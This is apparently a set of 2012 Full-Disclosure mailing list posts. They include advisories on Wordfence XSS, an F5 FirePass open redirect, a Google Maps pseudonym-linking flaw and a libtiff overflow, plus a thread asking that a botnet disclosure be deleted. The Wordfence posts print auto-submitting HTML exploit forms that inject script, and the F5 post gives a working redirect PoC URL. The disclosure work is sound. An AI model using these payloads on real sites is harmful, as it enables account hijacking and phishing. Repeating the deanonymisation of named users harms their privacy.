Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
Full Disclosure Maillist Admin, please kindly delete the posted email of vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities posted in Full Disclosure, for the security purpose. Understanding the positive purpose of the researchers who expose it ; Still, this vulns concept cannot be exposed in public, where the merit of its exposure is not equal to the DAMAGE caused by exposing such information. The disclosure damage itself is affecting other botnets takedown process which adding the challange effort taken, so takedowns will be harder than before. VOlk-Botnet 4.0. is a malicious application whose origins have been traced back to Mexico. The system was designed w/common concept of a malicious botnets infrastructure. --- Hendrik ADRIAN - http://0day.jp OP #MalwareMustDie http://malwaremustdie.blogspot.com/ Sent to you by ZeroDay.JP via Google Reader: vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities via Full Disclosure on 10/11/12 Posted by Vulnerability Lab on Oct 11 Title: == vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities Date: = 2012-10-09 References: === http://www.vulnerability-lab.com/get_content.php?id=721 VL-ID: = 721 Common Vulnerability Scoring System: 8.3 Introduction: = vOlk-Botnet v4.0 is a remote administration tool, its main function is to manage the HOSTS file of the windows operating systems The code created... Things you can do from here: - Subscribe to Full Disclosure using Google Reader - Get started using Google Reader to easily keep up with all your favorite sites ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
also while we're at it can you please remove all references to common sense and logic in any emails that are in the full disclosure archive. wait... On Sun, Oct 21, 2012 at 2:09 PM, ZeroDay.JP unixfreaxj...@gmail.com wrote: Full Disclosure Maillist Admin, please kindly delete the posted email of vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities posted in Full Disclosure, for the security purpose. Understanding the positive purpose of the researchers who expose it ; Still, this vulns concept cannot be exposed in public, where the merit of its exposure is not equal to the DAMAGE caused by exposing such information. The disclosure damage itself is affecting other botnets takedown process which adding the challange effort taken, so takedowns will be harder than before. VOlk-Botnet 4.0. is a malicious application whose origins have been traced back to Mexico. The system was designed w/common concept of a malicious botnets infrastructure. --- Hendrik ADRIAN - http://0day.jp OP #MalwareMustDie http://malwaremustdie.blogspot.com/ Sent to you by ZeroDay.JP via Google Reader: vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities via Full Disclosure on 10/11/12 Posted by Vulnerability Lab on Oct 11 Title: == vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities Date: = 2012-10-09 References: === http://www.vulnerability-lab.com/get_content.php?id=721 VL-ID: = 721 Common Vulnerability Scoring System: 8.3 Introduction: = vOlk-Botnet v4.0 is a remote administration tool, its main function is to manage the HOSTS file of the windows operating systems The code created... Things you can do from here: Subscribe to Full Disclosure using Google Reader Get started using Google Reader to easily keep up with all your favorite sites ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
Hmm, Another 'security' plugin with vulnerabilities... What exactly is the point of them? Even in an ideal world surely WP should be secure anyway - doesn't it just increase the attack surface? Philip Whitehouse On 19 Oct 2012, at 18:16, MustLive mustl...@websecurity.com.ua wrote: Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. - Affected products: - Vulnerable are Wordfence Security 3.3.5 and previous versions. -- Details: -- XSS (WASC-08): Wordfence Security XSS.html html head titleWordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=scriptalert(document.cookie)/script /form /body /html Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html html head titleWordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=ad...@e-mail.com /form /body /html I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress
This has been fixed and the release just went out. Version 3.3.7. The email param is now escaped and we've added rate limiting to the form with a 3 minute backoff if the limit is exceeded. http://wordpress.org/extend/plugins/wordfence/changelog/ Thanks for your report. Regards, Mark Maunder. On Fri, Oct 19, 2012 at 7:16 PM, MustLive mustl...@websecurity.com.uawrote: Hello list! I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for WordPress. Wordfence - it's security plugin for WordPress. - Affected products: - Vulnerable are Wordfence Security 3.3.5 and previous versions. -- Details: -- XSS (WASC-08): Wordfence Security XSS.html html head titleWordfence Security XSS exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=scriptalert(document.cookie)/script /form /body /html Insufficient Anti-automation (WASC-21): Wordfence Security IAA.html html head titleWordfence Security IAA exploit (C) 2012 MustLive. http://websecurity.com.ua/title /head body onLoad=document.hack.submit() form name=hack action=http://site/?_wfsf=unlockEmail; method=post input type=hidden name=email value=ad...@e-mail.com /form /body /html I've informed the plugin developer about vulnerabilities. And mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6106/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Mark Maunder mmaun...@gmail.com France: (+33) 068-700-8029 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Maps pseudonym disclosure vulnerability via Google Places reviews
Update: the Maps team has fixed this issue using both of my suggested patches. a) Reviews are no longer listed on Maps user profiles, thus removing the forward link b) Reviews are listed on G+ user profiles, thus making clear the disclosure. Credit where credit is due. - Sai On Mon, Oct 1, 2012 at 6:04 PM, Sai s...@saizai.com wrote: Recently, Google Places (aka Yelp Lite :-P) got linked to G+ profiles. This linkage has created a potentially serious privacy vulnerability. To my knowledge it has not previously been disclosed; I know it thanks to a tip from a concerned Google maps user. So, first off, the integration isn't fully obvious; it's not listed on the G+ about page. It is explicitly disclosed when you opt in to reviews that it will be linked to your profile, just not always obvious afterwards. Consider for instance +103351126638314796068. His About page doesn't list anything, which would seem to imply that he doesn't want his reviews linked with his G+ profile (which has what is presumably his legal name). However, if you go to https://plus.google.com/local/*/s/by%3A103351126638314796068 (same ID number) you'll find that he has reviewed +10071232321655907. (Although that personal reviews link _doesn't_ link to his G+ profile directly, the restaurant's Page _does_ do so, and of course it's intrinsic to the ID number in the URL.) If you do a google search for the review text, you can see that at least one third party site has already scraped it. Now, this wouldn't be too bad by itself. It's a couple UI flaws, and to my knowledge you can't get from here to what I'm about to talk about, only the other way 'round. However, suppose that instead you had started by looking at this map of the West Coast Electric Highway: https://maps.google.com/maps/ms?hl=engl=usie=UTF8oe=UTF8msa=0msid=214874436355124459198.0004c15567ce4ce290f50 You can see that it was created by someone with the username _jimad_. Click that, and you go to an anonymous Google Maps profile page, which lists another two maps made by jimad… and what seems to be an anonymous review of +10071232321655907. However, if you google the review text — or just click through the restaurant's name — you can then search through the reviews, and see that the writer of that review was in fact +103351126638314796068. So to review, the improper disclosure — which is _not_ anywhere consented to or explained to my knowledge — is that the Google Maps profile _jimad_ belongs to _+103351126638314796068_. (TTBOMK you can't get the reverse linkage; please let me know if not.) In this case, that disclosure is relatively innocuous; knowing who has mapped the West Coast Electric Highway isn't that big a deal. Consider other cases, though, where the creator of a map may have a significant privacy interest in their identity not being disclosed, like this map of porn stores and churches on I-70, by Google Maps user Taylor http://goo.gl/maps/7avuJ; or this map of Mumbai attacks by user Omar http://goo.gl/maps/dKbcA. Both are currently safe — the only thing disclosed is a separate name, and it's not linked to their G+ profiles or legal names. If either of them were to, say, review a restaurant, they would be told and have the impression that the only link they are creating is between their profile and the review. However, what they would also be creating is a public link between their _maps_ and their profile, and this isn't something they would've consented to. This can be mitigated pretty easily: just patch the Google Maps profile page to remove the reviews section, and/or make explicit the linkage in the opt-in consent for Google Places. However, it's already public, and the data's probably already been scraped significantly, so at this point it can't be fully fixed. I hope that the Google Maps, Places, Plus teams take immediate action to correct this before it results in a leak that hurts someone — and thanks again to my anonymous informant for the tip. - Sai posted originally to: https://plus.google.com/103112149634414554669/posts/F12kZrPrwm2 — look for updates there, and +### are Google+ profile links ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
As pequest, re-se w/o references: Full Disclosure Maillist Admin, please kindly delete the posted email of vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities posted in Full Disclosure, for the security purpose. Understanding the positive purpose of the researchers who expose it ; Still, this vulns concept cannot be exposed in public, where the merit of its exposure is not equal to the DAMAGE caused by exposing such information. The disclosure damage itself is affecting other botnets takedown process which adding the challange effort taken, so takedowns will be harder than before. VOlk-Botnet 4.0. is a malicious application whose origins have been traced back to Mexico. The system was designed w/common concept of a malicious botnets infrastructure. --- Hendrik ADRIAN - http://0day.jp OP #MalwareMustDie http://malwaremustdie.blogspot.com/ On Sun, Oct 21, 2012 at 10:21 PM, Benji m...@b3nji.com wrote: also while we're at it can you please remove all references to common sense and logic in any emails that are in the full disclosure archive. wait... On Sun, Oct 21, 2012 at 2:09 PM, ZeroDay.JP unixfreaxj...@gmail.com wrote: Full Disclosure Maillist Admin, please kindly delete the posted email of vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities posted in Full Disclosure, for the security purpose. Understanding the positive purpose of the researchers who expose it ; Still, this vulns concept cannot be exposed in public, where the merit of its exposure is not equal to the DAMAGE caused by exposing such information. The disclosure damage itself is affecting other botnets takedown process which adding the challange effort taken, so takedowns will be harder than before. VOlk-Botnet 4.0. is a malicious application whose origins have been traced back to Mexico. The system was designed w/common concept of a malicious botnets infrastructure. --- Hendrik ADRIAN - http://0day.jp OP #MalwareMustDie http://malwaremustdie.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection
1. OVERVIEW F5 FirePass SSL VPN is vulnerable to Open URL Redirection. 2. BACKGROUND F5 FirePass SSL VPN provides secure remote access to enterprise applications and data for users over any device or network while protecting your corporate. (See http://www.f5.com/pdf/products/firepass-overview.pdf) 3. VULNERABILITY DESCRIPTION F5 FirePass SSL VPN contains a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not validate the refreshURL parameter upon submission to the my.activation.cns.php3 script. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. 4. VERSIONS AFFECTED 4xxx Series 5. PROOF-OF-CONCEPT/EXPLOIT https://[VPN_HOST]/my.activation.cns.php3?langchar=ui_translation=refreshURL=http://yehg.net/ 6. SOLUTION We have not been informed of the fix. We believe this issue should be fixed by the time of releasing our advisory. 7. VENDOR F5 Networks, Inc. 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-03-31: notified vendor 2012-04-04: vendor acknowledged 2012-10-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BF5_firepass4x%5D_url_redirection OWASP Top 10 2010 - A 10: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards SANS Top 25 - Rank 23: http://cwe.mitre.org/top25/#CWE-601 CWE-601: http://cwe.mitre.org/data/definitions/601.html #yehg [2012-10-20] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2561-1] tiff security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2561-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff October 21, 2012 http://www.debian.org/security/faq - - Package: tiff Vulnerability : buffer overflow Problem type : local(remote) Debian-specific: no CVE ID : CVE-2012-4447 It was discovered that a buffer overflow in libtiff's parsing of files using PixarLog compression could lead to the execution of arbitrary code. For the stable distribution (squeeze), this problem has been fixed in version 3.9.4-5+squeeze6. For the testing distribution (wheezy) and the unstable distribution sid), this problem has been fixed in version 3.9.6-9 of the tiff3 source package and in version 4.0.2-4 of the tiff source package. We recommend that you upgrade your tiff packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlCEHHIACgkQXm3vHE4uylrbNgCgj1z+KMxqNBioKct5cwa7qD6S P2IAnjjisFo2oDGBS3cH4IECT7CVYxOd =4Wjs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection
On Oct 21, 2012, at 6:38 AM, YGN Ethical Hacker Group li...@yehg.net wrote: 4. VERSIONS AFFECTED 4xxx Series What versions of firmware are at risk? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/